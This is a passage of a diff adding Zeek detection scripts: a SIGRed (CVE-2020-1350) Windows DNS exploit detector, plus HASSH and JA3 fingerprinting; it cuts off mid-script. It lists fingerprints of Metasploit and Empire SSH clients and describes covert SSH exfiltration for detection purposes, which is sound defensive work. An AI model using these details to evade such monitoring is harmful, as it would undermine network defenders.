+|Potential CVE-2020-1350 Windows DNS exploit (CVE10) has been detected (large DNS RRSIG/TKEY response).  Refer to links:  https://cve.mitre.org/cgi-bin/cvename.cgi?name=ALAS-2020-1350 and https://research.checkpoint.com/2020/resolving-your-way-into-domain-admin-exploiting-a-17-year-old-bug-in-windows-dns-servers/|Medium/High|
--- a/capitalone/external/CVE-2020-1350/load.zeek
+++ b/capitalone/external/CVE-2020-1350/load.zeek
@ -0,0 +1 @@
+@load ./CVE-2020-1350.zeek
--- a/capitalone/external/CVE-2020-1350/bro-pkg.meta
+++ b/capitalone/external/CVE-2020-1350/bro-pkg.meta
@ -0,0 +1,5 @@
+[package]
+description = (SIGRed CVE-2020-1350 Windows DNS Server exploit detection)
+tags = SIGRed, CVE-2020-1350, DNS, Windows, Microsoft
+version = 0.21
+script_dir = scripts
--- a/capitalone/external/CVE-2020-1350/scripts/CVE-2020-1350.zeek
+++ b/capitalone/external/CVE-2020-1350/scripts/CVE-2020-1350.zeek
@ -0,0 +1,65 @@
+module CVE_2020_1350;
+# This script raises notices relating to the CVE-2020-1350 (AKA SIGRed)
+# affecting Windows DNS Server with a CVE score of 10.0
+# Tested on zeek 3.2.0-dev.459
+# Authors: Ben Reardon, Research Team @Corelight. ben.reardon@corelight.com, @benreardon
+#          Ryan Victory, Applications Team Manager @Corelight. ryan.victory@corelight.com @beerandraptors
+#
+# Version: 0.21
+export {
+    redef enum Notice::Type += {
+        CVE_2020_1350_Detected_High_Confidence,
+        CVE_2020_1350_Potential
+    };
+    global AXFR_cuid: table[string] of count &default=0 &write_expire=1hr;
+}
+# A list of DNS Record types: https://en.wikipedia.org/wiki/List_of_DNS_record_types
+# While the primary known attack vector involves the SIG query type,
+# at this stage of development let's select query types that are associated with signatures 
+# as these are more likely to be parsed by vulnerable function. SIG, KEY, TKEY and RRSIG
+
+# Function to take a dns event and look for indicators of the CVE-2020-1350 exploit
+function handle_dns_event(c: connection, ans: dns_answer) 
+    {
+    # If the connection is a non primary packet of an AXFR, return. Only the first AXFR is marked as so, 
+    # the following packets are not marked AXFR.
+    if (c$uid in AXFR_cuid)
+        return;
+
+    if (c$resp$size >= 65258)  
+        {
+        # A guardrail for Zone transfer types AXFR(252) and IXFR(251) that may legitimately exceed the proxy size of 65535
+        if (ans$qtype == 252 || ans$qtype == 251)
+            {
+            # Need to track the uid of the AXFR because only the first packet is logged as query type AXFR
+            ++AXFR_cuid[c$uid];
+            return;
+            }
+        local notice_type = CVE_2020_1350_Potential;
+        local message = "Potential CVE-2020-1350 Windows DNS exploit (CVE10) has been detected (large DNS response).  Refer to links:  https://cve.mitre.org/cgi-bin/cvename.cgi?name=ALAS-2020-1350 and https://research.checkpoint.com/2020/resolving-your-way-into-domain-admin-exploiting-a-17-year-old-bug-in-windows-dns-servers/";
+        if (ans$qtype == 24 || ans$qtype == 25) # SIG/KEY query code and a large response, high confidence!
+            {
+            notice_type = CVE_2020_1350_Detected_High_Confidence;
+            message = "CVE-2020-1350 Windows DNS exploit (CVE10) has been detected (High Confidence, large SIG/KEY response).  Refer to links:  https://cve.mitre.org/cgi-bin/cvename.cgi?name=ALAS-2020-1350 and https://research.checkpoint.com/2020/resolving-your-way-into-domain-admin-exploiting-a-17-year-old-bug-in-windows-dns-servers/";
+            }
+        else if (ans$qtype == 46 || ans$qtype == 249) # RRSIG
+            {
+            message = "Potential CVE-2020-1350 Windows DNS exploit (CVE10) has been detected (large DNS RRSIG/TKEY response).  Refer to links:  https://cve.mitre.org/cgi-bin/cvename.cgi?name=ALAS-2020-1350 and https://research.checkpoint.com/2020/resolving-your-way-into-domain-admin-exploiting-a-17-year-old-bug-in-windows-dns-servers/";
+            }
+        NOTICE([$note=notice_type,
+                $conn=c,
+                $identifier=cat(c$id$orig_h,c$id$resp_h),
+                $msg=message,
+                $suppress_for=1 hr]);
+        }
+    }
+# RRSIG (qtype == 46) currently has it's own zeek event and wouldn't trigger the dns_unknown_reply event
+event dns_RRSIG(c: connection, msg: dns_msg, ans: dns_answer, rrsig: dns_rrsig_rr)
+    {
+    handle_dns_event(c, ans);
+    }
+# SIG (qtype == 24), KEY (qtype == 25), TKEY (qtype == 249) do not have their own event and so should be parsed by the catch-all event 
+event dns_unknown_reply(c: connection, msg: dns_msg, ans: dns_answer)
+    {
+    handle_dns_event(c, ans);
+    }
--- a/capitalone/external/CVE-2020-1350/scripts/load.zeek
+++ b/capitalone/external/CVE-2020-1350/scripts/load.zeek
@ -0,0 +1 @@
+@load ./CVE-2020-1350
--- a/capitalone/external/CVE-2020-1350/zkg.meta
+++ b/capitalone/external/CVE-2020-1350/zkg.meta
@ -0,0 +1,5 @@
+[package]
+description = (SIGRed CVE-2020-1350 Windows DNS Server exploit detection)
+tags = SIGRed, CVE-2020-1350, DNS, Windows, Microsoft
+version = 0.21
+script_dir = scripts
--- a/capitalone/external/load.zeek
+++ b/capitalone/external/load.zeek
@ -0,0 +1,5 @@
+# Load external scripts
+@load ./ja3
+@load ./mitre_bzar
+@load ./hassh
+@load ./CVE-2020-1350
--- a/capitalone/external/hassh/LICENSE.txt
+++ b/capitalone/external/hassh/LICENSE.txt
@ -0,0 +1,12 @@
+Copyright (c) 2018, Salesforce.com, Inc.
+All rights reserved.
+
+Redistribution and use in source and binary forms, with or without modification, are permitted provided that the following conditions are met:
+
+* Redistributions of source code must retain the above copyright notice, this list of conditions and the following disclaimer.
+
+* Redistributions in binary form must reproduce the above copyright notice, this list of conditions and the following disclaimer in the documentation and/or other materials provided with the distribution.
+
+* Neither the name of Salesforce.com nor the names of its contributors may be used to endorse or promote products derived from this software without specific prior written permission.
+
+THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS "AS IS" AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT HOLDER OR CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.
--- a/capitalone/external/hassh/README.md
+++ b/capitalone/external/hassh/README.md
@ -0,0 +1,76 @@
+# "HASSH" - a Profiling Method for SSH Clients and Servers.
+
+<p align="center">
+  <img src="logo.png" width="850" title="hassh">
+  
+</p>
+
+
+"HASSH" is a network fingerprinting standard which can be used to identify specific Client and Server SSH implementations. The fingerprints can be easily stored, searched and shared in the form of an MD5 fingerprint.
+
+[![License: BSD 3-Clause License](https://img.shields.io/badge/License-BSD%203--Clause-blue.svg)](https://opensource.org/licenses/BSD-3-Clause)
+## What can HASSH help with:
+- Use in highly controlled, well understood environments, where any fingerprints outside of a known good set are alertable.
+- It is possible to detect, control and investigate brute force or Cred Stuffing password attempts at a higher level of granularity than IP Source - which may be impacted by NAT or botnet-like behaviour. The hassh will be a feature of the specific Client software implementation being used, even if the IP is NATed such that it is shared by many other SSH clients.
+- Detect covert exfiltration of data within the components of the Client algorithm sets. In this case, a specially coded SSH Client can send data outbound from a trusted to a less trusted environment within a series of SSH_MSG_KEXINIT packets. In a scenario similar to the more known exfiltration via DNS, data could be sent as a series of attempted, but incomplete and unlogged connections to an SSH server controlled by bad actors who can then record, decode and reconstitute these pieces of data into their original form.  Until now such attempts - much less the contents of the clear text packets - are not logged even by mature packet analyzers or on end point systems. Detection of this style of exfiltration can now be performed easily by using anomaly detection or alerting on SSH Clients with multiple different hassh
+- Use in conjunction with other contextual indicators, for example detect Network discovery and Lateral movement attempts by unusual hassh such as those used by Paramiko, Powershell, Ruby, Meterpreter, Empire.
+- Share malicious hassh as Indicators of Compromise.
+- Create an additional level of Client application control, for example one could block all Clients from connecting to an SSH server that are outside of an approved known set of hassh values.
+- Contribute to Non Repudiation in a Forensic context - at a higher level of abstraction than IPSource -  which may be impacted by NAT, or where multiple IP Sources are used.
+- Detect Deceptive Applications. Eg a hasshServer value known to belong to the Cowry/Kippo SSH honeypot server installation, which is purporting to be a common OpenSSH server in the Server String.
+- Detect devices having a hassh known to belong to IOT embedded systems. Examples may include cameras, mics, keyloggers, wiretaps that could be easily be hidden from view and communicating quietly over encrypted channels back to a control server. 
+
+## How does HASSH work:
+"hassh" and "hasshServer" are MD5 hashes constructed from a specific set of algorithms that are supported by various SSH  Client and Server Applications. These algorithms are exchanged after the initial TCP three-way handshake as clear-text packets known as "SSH_MSG_KEXINIT" messages, and are an integral part of the setup of the final encrypted SSH channel. 
+The existence and ordering of these algorithms is unique enough such that it can be used as a fingerprint to help identify the underlying Client and Server application or unique implementation, regardless of higher level ostensible identifiers such as "Client" or "Server" strings.  
+<p align="center">
+<img src="packet_sequence.png" width="700" title="Packet sequence">
+</p>  
+
+## Example 1: Client Fingerprinting - the "hassh"
+For the "Cyberduck" SFTP client (specifically SSH-2.0-Cyberduck/6.7.1.28683 (Mac OS X/10.13.6) (x86_64)" , the set of supported algorithms is as follows :
+
+|Function|Algorithms seen in SSH_MSG_KEXINIT packets|
+| ------------- | ------------- |
+|Key Exchange methods|```curve25519-sha256@libssh.org,diffie-hellman-group-exchange-sha256,ecdh-sha2-nistp521,ecdh-sha2-nistp384,ecdh-sha2-nistp256,diffie-hellman-group-exchange-sha1,diffie-hellman-group1-sha1,diffie-hellman-group14-sha1,diffie-hellman-group14-sha256,diffie-hellman-group15-sha512,diffie-hellman-group16-sha512,diffie-hellman-group17-sha512,diffie-hellman-group18-sha512,diffie-hellman-group14-sha256@ssh.com,diffie-hellman-group15-sha256,diffie-hellman-group15-sha256@ssh.com,diffie-hellman-group15-sha384@ssh.com,diffie-hellman-group16-sha256,diffie-hellman-group16-sha384@ssh.com,diffie-hellman-group16-sha512@ssh.com,diffie-hellman-group18-sha512@ssh.com```|
+|Encryption| ```aes128-cbc,aes128-ctr,aes192-cbc,aes192-ctr,aes256-cbc,aes256-ctr,blowfish-cbc,blowfish-ctr,cast128-cbc,cast128-ctr,idea-cbc,idea-ctr,serpent128-cbc,serpent128-ctr,serpent192-cbc,serpent192-ctr,serpent256-cbc,serpent256-ctr,3des-cbc,3des-ctr,twofish128-cbc,twofish128-ctr,twofish192-cbc,twofish192-ctr,twofish256-cbc,twofish256-ctr,twofish-cbc,arcfour,arcfour128,arcfour256```|
+|Message Authentication|```hmac-sha1,hmac-sha1-96,hmac-md5,hmac-md5-96,hmac-sha2-256,hmac-sha2-512```|
+|Compression|```zlib@openssh.com,zlib,none```|
+
+Concatenating these algorithms together with a delimiter of ";" gives the hasshAlgorithms, which is useful for detailed analysis.  
+```curve25519-sha256@libssh.org,diffie-hellman-group-exchange-sha256,ecdh-sha2-nistp521,ecdh-sha2-nistp384,ecdh-sha2-nistp256,diffie-hellman-group-exchange-sha1,diffie-hellman-group1-sha1,diffie-hellman-group14-sha1,diffie-hellman-group14-sha256,diffie-hellman-group15-sha512,diffie-hellman-group16-sha512,diffie-hellman-group17-sha512,diffie-hellman-group18-sha512,diffie-hellman-group14-sha256@ssh.com,diffie-hellman-group15-sha256,diffie-hellman-group15-sha256@ssh.com,diffie-hellman-group15-sha384@ssh.com,diffie-hellman-group16-sha256,diffie-hellman-group16-sha384@ssh.com,diffie-hellman-group16-sha512@ssh.com,diffie-hellman-group18-sha512@ssh.com;aes128-cbc,aes128-ctr,aes192-cbc,aes192-ctr,aes256-cbc,aes256-ctr,blowfish-cbc,blowfish-ctr,cast128-cbc,cast128-ctr,idea-cbc,idea-ctr,serpent128-cbc,serpent128-ctr,serpent192-cbc,serpent192-ctr,serpent256-cbc,serpent256-ctr,3des-cbc,3des-ctr,twofish128-cbc,twofish128-ctr,twofish192-cbc,twofish192-ctr,twofish256-cbc,twofish256-ctr,twofish-cbc,arcfour,arcfour128,arcfour256;hmac-sha1,hmac-sha1-96,hmac-md5,hmac-md5-96,hmac-sha2-256,hmac-sha2-512;zlib@openssh.com,zlib,none```
+
+Finally the hassh is simply the MD5 of hasshAlgorithms, and is used for storage, searching and sharing. Some examples follow:
+
+```de30354b88bae4c2810426614e1b6976```  Powershell Renci.SshNet.SshClient.0.0.1 (used by Empire exploit modules)
+```fafc45381bfde997b6305c4e1600f1bf```  Ruby/Net::SSH_5.0.2 x86_64-linux (used by Metasploit exploit modules)
+```b5752e36ba6c5979a575e43178908adf```	Python Paramiko_2.4.1 (used by Metasploit exploit modules) 
+```16f898dd8ed8279e1055350b4e20666c```	Dropbear_2012.55 (used in IOT embedded systems)  
+```8a8ae540028bf433cd68356c1b9e8d5b```	CyberDuck Version 6.7.1 (28683)  
+```06046964c022c6407d15a27b12a6a4fb```	OpenSSH_7.7p1 Ubuntu-4  
+
+## Example 2: Server Fingerprinting - the "hasshServer"
+For a standard SSH-2.0-OpenSSH_5.3 SSH server, the set of supported algorithms is as follows :
+
+|Function|Algorithms seen in SSH_MSG_KEXINIT packets|
+| ------------- | ------------- |
+|Key Exchange methods| ```diffie-hellman-group-exchange-sha256,diffie-hellman-group-exchange-sha1,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1```|
+|Encryption| ```aes128-ctr,aes192-ctr,aes256-ctr,arcfour256,arcfour128,aes128-cbc,3des-cbc,blowfish-cbc,cast128-cbc,aes192-cbc,aes256-cbc,arcfour,rijndael-cbc@lysator.liu.se```|
+|Message Authentication|```hmac-md5,hmac-sha1,umac-64@openssh.com,hmac-ripemd160,hmac-ripemd160@openssh.com,hmac-sha1-96,hmac-md5-96```|
+|Compression|```none,zlib@openssh.com```|
+
+Concatenating these algorithms together with a delimiter of ";" gives the hasshServerAlgorithms, which is useful for detailed analysis.  
+```diffie-hellman-group-exchange-sha256,diffie-hellman-group-exchange-sha1,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1;aes128-ctr,aes192-ctr,aes256-ctr,arcfour256,arcfour128,aes128-cbc,3des-cbc,blowfish-cbc,cast128-cbc,aes192-cbc,aes256-cbc,arcfour,rijndael-cbc@lysator.liu.se;hmac-md5,hmac-sha1,umac-64@openssh.com,hmac-ripemd160,hmac-ripemd160@openssh.com,hmac-sha1-96,hmac-md5-96;none,zlib@openssh.com```
+
+Finally the hasshServer is simply the MD5 of hasshServerAlgorithms, some examples follow:
+```c1c596caaeb93c566b8ecf3cae9b5a9e``` SSH-2.0-dropbear_2016.74	  
+```d93f46d063c4382b6232a4d77db532b2``` SSH-2.0-dropbear_2016.72	  
+```2dd9a9b3dbebfaeec8b8aabd689e75d2``` SSH-2.0-AWSCodeCommit  
+```696e7f84ac571fdf8fa5073e64ee2dc8``` SSH-2.0-FTP   
+
+## References:
+- [RFC4253 The Secure Shell (SSH) Transport Layer Protocol](https://www.ietf.org/rfc/rfc4253.txt)
+- [Salesforce Engineering blog](https://engineering.salesforce.com/open-sourcing-hassh-abed3ae5044c)
+
+## Credits:
+hassh and hasshServer were conceived and developed by [Ben Reardon](mailto:breardon@salesforce.com) ([@benreardon](https://twitter.com/@benreardon)) within the Detection Cloud Team at Salesforce, with inspiration and contributions from [Adel Karimi](mailto:akarimishiraz@salesforce.com) (@0x4d31) and the [JA3 crew](https://github.com/salesforce/ja3/)  crew:[John B. Althouse](mailto:jalthouse@salesforce.com)  , [Jeff Atkinson](mailto:jatkinson@salesforce.com) and [Josh Atkins](mailto:j.atkins@salesforce.com)
--- a/capitalone/external/hassh/load.zeek
+++ b/capitalone/external/hassh/load.zeek
@ -0,0 +1 @@
+@load ./hassh.zeek
--- a/capitalone/external/hassh/hassh.zeek
+++ b/capitalone/external/hassh/hassh.zeek
@ -0,0 +1,144 @@
+#                               HASSH                                #
+#             SSH Key Initiation Exchange Fingerprinting             #
+#                                                                    #
+# Script Version: v1.5 22 August 2019                                #
+# Authors: Ben Reardon (breardon@salesforce.com, @benreardon)        #
+#        : Jeff Atkinson (jatkinson@salesforce.com)                  #
+#        : John Althouse (jalthouse@salesforce.com)                  #
+# Description:  This Zeek script appends hassh data to ssh.log       #
+#               by enumerating the SSH_MSG_KEXINIT packets sent      #
+#               as clear text between the client and server as part  # 
+#               of the negotiation of an SSH connection.             #
+#                                                                    #
+# Copyright (c) 2018, salesforce.com, inc.                           #
+# All rights reserved.                                               #
+# SPDX-License-Identifier: BSD-3-Clause                              #
+# For full license text, see the LICENSE file in the repo root or    #
+# https://opensource.org/licenses/BSD-3-Clause                       #
+
+
+module SSH;
+
+export {
+    type HASSHStorage: record {
+        hasshVersion:string &log &default="1.1"; # ANY change in hassh/hasshServer composition requires Version update 
+        hassh:   string   &log &optional &default="";
+        hasshServer:   string  &log &optional &default="";
+        
+        # Client variables #
+        ckex:    string   &log &optional &default="";
+        cshka:   string   &log &optional &default="";
+        ceacts:  string   &log &optional &default="";
+        cmacts:  string   &log &optional &default="";
+        ccacts:  string   &log &optional &default="";
+        #clcts:  string   &log &optional &default=""; 
+        hasshAlgorithms:  string  &log &optional &default="";
+        
+        # Server variables #
+        skex:     string  &log &optional &default="";
+        sshka:    string  &log &optional &default="";
+        seastc:   string  &log &optional &default="";
+        smastc:   string  &log &optional &default="";
+        scastc:   string  &log &optional &default="";
+        #slstc:   string  &log &optional &default="";
+        hasshServerAlgorithms:  string  &log &optional &default="";
+    };
+}
+
+redef record connection += {
+    hassh: HASSHStorage &optional;
+};
+    
+redef record SSH::Info += {
+    hasshVersion:  string  &log &optional;
+    hassh:         string  &log &optional;
+    hasshServer:   string  &log &optional;
+    
+    # ===> Log Client variables <=== #
+    # Comment out any fields that are not required to be logged in their raw form to ssh.log
+    #ckex:    string   &log &optional;
+    cshka:   string   &log &optional; 
+    #ceacts:  string   &log &optional; 
+    #cmacts:  string   &log &optional;
+    #ccacts:  string   &log &optional; 
+    #clcts:   string   &log &optional;
+    hasshAlgorithms:  string  &log &optional;
+    
+    # ===> Log Server variables <=== #
+    # Comment out any fields that are not required to be logged in their raw form to ssh.log
+    #skex:     string  &log &optional; 
+    sshka:    string  &log &optional; 
+    #seastc:   string  &log &optional; 
+    #smastc:   string  &log &optional; 
+    #scastc:   string  &log &optional; 
+    #slstc:    string  &log &optional;
+    hasshServerAlgorithms:  string  &log &optional;
+};
+
+
+# Build Client Application fingerprint #
+function get_hassh(c:connection, capabilities: SSH::Capabilities ) {
+    c$hassh = HASSHStorage();
+    c$hassh$ckex   = join_string_vec(capabilities$kex_algorithms,",");
+    c$hassh$ceacts = join_string_vec(capabilities$encryption_algorithms$client_to_server,",");
+    c$hassh$cmacts = join_string_vec(capabilities$mac_algorithms$client_to_server,",");
+    c$hassh$ccacts = join_string_vec(capabilities$compression_algorithms$client_to_server,",");
+    c$hassh$cshka  = join_string_vec(capabilities$server_host_key_algorithms,","); # The Host key algorithm set may be useful information by itself but is not included in the hassh.
+    #c$hassh$clcts  = join_string_vec(capabilities$languages$client_to_server,","); # The Languages field may be useful information by itself but is not included in the hasshServer.
+    c$hassh$hasshAlgorithms = string_cat(c$hassh$ckex,";",c$hassh$ceacts,";",c$hassh$cmacts,";",c$hassh$ccacts); # Contatenate the four selected lists of algorithms (Key,Enc,MAC,Compression) to build the Client hash
+    c$hassh$hassh = md5_hash(c$hassh$hasshAlgorithms);
+}
+
+# Build Server Application fingerprint #
+function get_hasshServer(c:connection, capabilities: SSH::Capabilities ) {
+    c$hassh = HASSHStorage();
+    c$hassh$skex   = join_string_vec(capabilities$kex_algorithms,",");
+    c$hassh$seastc = join_string_vec(capabilities$encryption_algorithms$server_to_client,",");
+    c$hassh$smastc = join_string_vec(capabilities$mac_algorithms$server_to_client,",");
+    c$hassh$scastc = join_string_vec(capabilities$compression_algorithms$server_to_client,",");
+    c$hassh$sshka  = join_string_vec(capabilities$server_host_key_algorithms,","); # The Host key algorithm set may be useful information by itself but is not included in the hasshServer.
+    #c$hassh$slstc  = join_string_vec(capabilities$languages$server_to_client,","); # The Languages field may be useful information by itself but is not included in the hasshServer.
+    c$hassh$hasshServerAlgorithms = string_cat(c$hassh$skex,";",c$hassh$seastc,";",c$hassh$smastc,";",c$hassh$scastc); # Contatenate the four selected lists of algorithms (Key,Enc,Message,Compression) to build the Server hash
+    c$hassh$hasshServer = md5_hash(c$hassh$hasshServerAlgorithms);
+}
+
+# Event #
+event ssh_capabilities(c: connection, cookie: string, capabilities: SSH::Capabilities) {
+    if ( !c?$ssh ) {return;}
+    c$hassh = HASSHStorage();
+    
+    # Prior to 2.6.0 Zeek has a bug which it reverses the Client/server flag.
+    # See https://github.com/zeek/zeek/pull/191
+    # The "if" statements here do a version check to account for this bug in versions older than 2.6.0
+    
+    if ((Version::info$version_number < 20600 && capabilities$is_server == T) || (Version::info$version_number >= 20600 && capabilities$is_server == F) ) {
+        get_hassh(c, capabilities);
+        c$ssh$hasshVersion = c$hassh$hasshVersion;
+        c$ssh$hassh  = c$hassh$hassh;
+        
+        # ===> Log Client variables <=== #
+        # Comment out any fields that are not required to be logged in their raw form to ssh.log
+        #c$ssh$ckex   = c$hassh$ckex;
+        c$ssh$cshka  = c$hassh$cshka;
+        #c$ssh$ceacts = c$hassh$ceacts;
+        #c$ssh$cmacts = c$hassh$cmacts;
+        #c$ssh$ccacts = c$hassh$ccacts;
+        #c$ssh$clcts  = c$hassh$clcts;
+        c$ssh$hasshAlgorithms = c$hassh$hasshAlgorithms;
+    }
+    if ( (Version::info$version_number < 20600 && capabilities$is_server == F) || (Version::info$version_number >= 20600 && capabilities$is_server == T) ) {
+        get_hasshServer(c, capabilities);
+        c$ssh$hasshVersion = c$hassh$hasshVersion;
+        c$ssh$hasshServer = c$hassh$hasshServer;
+        
+        # ===> Log Server variables <=== #
+        # Comment out any fields that are not required to be logged in their raw form to ssh.log
+        #c$ssh$skex   = c$hassh$skex;
+        c$ssh$sshka  = c$hassh$sshka;
+        #c$ssh$seastc = c$hassh$seastc;
+        #c$ssh$smastc = c$hassh$smastc;
+        #c$ssh$scastc = c$hassh$scastc;
+        #c$ssh$slstc  = c$hassh$clcts;
+        c$ssh$hasshServerAlgorithms = c$hassh$hasshServerAlgorithms;
+    }
+}
--- a/capitalone/external/ja3/README.md
+++ b/capitalone/external/ja3/README.md
@ -0,0 +1,52 @@
+## Features
+- **ja3.bro** will add the field "ja3" to ssl.log.  
+  - It can also append fields used by JA3 to ssl.log
+
+- **intel_ja3.bro** will add INTEL::JA3 to the Bro Intel Framwork
+  - This will allow you to import JA3 fingerprints directly into your intel feed.
+  
+- **ja3s.bro** will add the field "ja3s" to ssl.log, JA3 for the server hello.
+  - It can also append fields used by JA3S to ssl.log.
+
+- Tested on Bro 2.4.1, 2.5, and 2.5.1
+
+## Installation
+- If you're running Bro >=2.5 or a Bro product like Corelight, you can install by using the Bro Package Manager and this one simple command:
+```bash
+bro-pkg install ja3
+```
+
+- For everyone else, download the files to bro/share/bro/site/ja3 and add this line to your local.bro script:
+```bash
+@load ./ja3
+```
+
+## Configuration
+
+By default ja3.bro will only append ja3 to the ssl.log. However, if you would like to log all aspects of the SSL Client Hello Packet, uncomment the following lines in ja3.bro
+```bash
+#  ja3_version:  string &optional &log;
+#  ja3_ciphers:  string &optional &log;
+#  ja3_extensions: string &optional &log;
+#  ja3_ec:         string &optional &log;
+#  ja3_ec_fmt:     string &optional &log;
+```
+...
+```bash
+#c$ssl$ja3_version = cat(c$tlsfp$client_version);
+#c$ssl$ja3_ciphers = c$tlsfp$client_ciphers;
+#c$ssl$ja3_extensions = c$tlsfp$extensions;
+#c$ssl$ja3_ec = c$tlsfp$e_curves;
+#c$ssl$ja3_ec_fmt = c$tlsfp$ec_point_fmt;
+```
+The same changes can be made in ja3s.bro as well.
+
+___  
+### JA3 Created by
+
+[John B. Althouse](mailto:jalthouse@salesforce.com)  
+[Jeff Atkinson](mailto:jatkinson@salesforce.com)  
+[Josh Atkins](mailto:j.atkins@salesforce.com)  
+
+Please send questions and comments to **[John B. Althouse](mailto:jalthouse@salesforce.com)**.
+
--- a/capitalone/external/ja3/load.zeek
+++ b/capitalone/external/ja3/load.zeek
@ -0,0 +1,3 @@
+@load ./ja3.zeek
+@load ./intel_ja3.zeek
+@load ./ja3s.zeek
--- a/capitalone/external/ja3/intel_ja3.zeek
+++ b/capitalone/external/ja3/intel_ja3.zeek
@ -0,0 +1,28 @@
+# This Zeek script adds JA3 to the Zeek Intel Framework as Intel::JA3
+#
+# Author: John B. Althouse (jalthouse@salesforce.com)
+#
+# Copyright (c) 2017, salesforce.com, inc.
+# All rights reserved.
+# Licensed under the BSD 3-Clause license. 
+# For full license text, see LICENSE.txt file in the repo root  or https://opensource.org/licenses/BSD-3-Clause
+
+module Intel;
+
+export {
+    redef enum Intel::Type += { Intel::JA3 };
+}
+
+export {
+    redef enum Intel::Where += { SSL::IN_JA3 };
+}
+
+@if ( Version::at_least("2.6") || ( Version::number == 20500 && Version::info$commit >= 944 ) )
+event ssl_client_hello(c: connection, version: count, record_version: count, possible_ts: time, client_random: string, session_id: string, ciphers: index_vec, comp_methods: index_vec)
+@else
+event ssl_client_hello(c: connection, version: count, possible_ts: time, client_random: string, session_id: string, ciphers: index_vec)
+@endif
+	{
+	if ( c$ssl?$ja3 )
+	Intel::seen([$indicator=c$ssl$ja3, $indicator_type=Intel::JA3, $conn=c, $where=SSL::IN_JA3]);
+	}
--- a/capitalone/external/ja3/ja3.zeek
+++ b/capitalone/external/ja3/ja3.zeek
@ -0,0 +1,153 @@
+# This Zeek script appends JA3 to ssl.log
+# Version 1.4 (January 2020)
+#
+# Authors: John B. Althouse (jalthouse@salesforce.com) & Jeff Atkinson (jatkinson@salesforce.com)
+#
+# Copyright (c) 2017, salesforce.com, inc.
+# All rights reserved.
+# Licensed under the BSD 3-Clause license. 
+# For full license text, see LICENSE.txt file in the repo root  or https://opensource.org/licenses/BSD-3-Clause
+
+module JA3;
+
+export {
+redef enum Log::ID += { LOG };
+}
+
+type TLSFPStorage: record {
+       client_version:  count &default=0 &log;
+       client_ciphers:  string &default="" &log;
+       extensions:      string &default="" &log;
+       e_curves:        string &default="" &log;
+       ec_point_fmt:    string &default="" &log;
+};
+
+redef record connection += {
+       tlsfp: TLSFPStorage &optional;
+};
+
+redef record SSL::Info += {
+  ja3:            string &optional &log;
+# LOG FIELD VALUES ##
+#  ja3_version:  string &optional &log;
+#  ja3_ciphers:  string &optional &log;
+#  ja3_extensions: string &optional &log;
+#  ja3_ec:         string &optional &log;
+#  ja3_ec_fmt:     string &optional &log;
+};
+
+# Google. https://tools.ietf.org/html/draft-davidben-tls-grease-01
+const grease: set[int] = {
+    2570,
+    6682,
+    10794,
+    14906,
+    19018,
+    23130,
+    27242,
+    31354,
+    35466,
+    39578,
+    43690,
+    47802,
+    51914,
+    56026,
+    60138,
+    64250
+};
+const sep = "-";
+event zeek_init() {
+    Log::create_stream(JA3::LOG,[$columns=TLSFPStorage, $path="tlsfp"]);
+}
+
+event ssl_extension(c: connection, is_orig: bool, code: count, val: string)
+{
+if ( ! c?$tlsfp )
+    c$tlsfp=TLSFPStorage();
+    if ( is_orig == T ) {
+        if ( code in grease ) {
+            return;
+        }
+        if ( c$tlsfp$extensions == "" ) {
+            c$tlsfp$extensions = cat(code);
+        }
+        else {
+            c$tlsfp$extensions = string_cat(c$tlsfp$extensions, sep,cat(code));
+        }
+    }
+}
+
+event ssl_extension_ec_point_formats(c: connection, is_orig: bool, point_formats: index_vec)
+{
+if ( !c?$tlsfp )
+    c$tlsfp=TLSFPStorage();
+    if ( is_orig == T ) {
+        for ( i in point_formats ) {
+            if ( point_formats[i] in grease ) {
+            next;
+            }
+            if ( c$tlsfp$ec_point_fmt == "" ) {
+            c$tlsfp$ec_point_fmt += cat(point_formats[i]);
+            }
+            else {
+            c$tlsfp$ec_point_fmt += string_cat(sep,cat(point_formats[i]));
+            }
+        }
+    }
+}
+
+event ssl_extension_elliptic_curves(c: connection, is_orig: bool, curves: index_vec)
+{
+    if ( !c?$tlsfp )
+    c$tlsfp=TLSFPStorage();
+    if ( is_orig == T  ) {
+        for ( i in curves ) {
+            if ( curves[i] in grease ) {
+            next;
+            }
+            if ( c$tlsfp$e_curves == "" ) {
+                c$tlsfp$e_curves += cat(curves[i]);
+            }
+            else {
+                c$tlsfp$e_curves += string_cat(sep,cat(curves[i]));
+            }
+        }
+    }
+}
+
+@if ( ( Version::number >= 20600 ) || ( Version::number == 20500 && Version::info$commit >= 944 ) )
+event ssl_client_hello(c: connection, version: count, record_version: count, possible_ts: time, client_random: string, session_id: string, ciphers: index_vec, comp_methods: index_vec) &priority=1
+@else
+event ssl_client_hello(c: connection, version: count, possible_ts: time, client_random: string, session_id: string, ciphers: index_vec) &priority=1
+@endif
+{
+    if ( !c?$tlsfp )
+    c$tlsfp=TLSFPStorage();
+    c$tlsfp$client_version = version;
+    for ( i in ciphers ) {
+        if ( ciphers[i] in grease ) {
+            next;
+        }
+        if ( c$tlsfp$client_ciphers == "" ) { 
+            c$tlsfp$client_ciphers += cat(ciphers[i]);
+        }
+        else {
+            c$tlsfp$client_ciphers += string_cat(sep,cat(ciphers[i]));
+        }
+    }
+    local sep2 = ",";
+    local ja3_string = string_cat(cat(c$tlsfp$client_version),sep2,c$tlsfp$client_ciphers,sep2,c$tlsfp$extensions,sep2,c$tlsfp$e_curves,sep2,c$tlsfp$ec_point_fmt);
+    local tlsfp_1 = md5_hash(ja3_string);
